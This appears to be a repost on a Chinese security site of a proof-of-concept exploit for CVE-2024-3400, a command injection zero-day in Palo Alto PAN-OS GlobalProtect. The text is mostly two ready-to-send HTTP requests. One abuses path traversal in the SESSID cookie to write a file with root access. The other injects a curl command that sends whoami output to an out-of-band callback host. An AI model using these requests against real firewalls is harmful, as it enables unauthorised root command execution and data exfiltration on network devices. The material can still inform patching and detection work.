标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3392] 作者: 闲云野鸡 发表于: [2024-04-19]
本文共 [115] 位读者顶过
Palo Alto OS 最近遭到命令注入0day攻击。这些是与零日漏洞相关的漏洞利用详细信息。
[出自:jiwo.org]
# CVE-2024-3400 CVE-2024-3400 Palo Alto OS Command Injection send this HTTP request: ```http POST /ssl-vpn/hipreport.esp HTTP/1.1 Host: 127.0.0.1 Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt; Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` ![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/96803de5-1d8c-42ec-b1fc-60e8e4a0a954) you will create hellome1337.txt file on the server with root access now if you try to access the files you should receive 403 insted of 404 ![image](https://github.com/h4x0r-dz/CVE-2024-3400/assets/26070859/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d) ### Command Injection ``` POST /ssl-vpn/hipreport.esp HTTP/1.1 Host: 127.0.01 Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`; Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` More Info : https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ |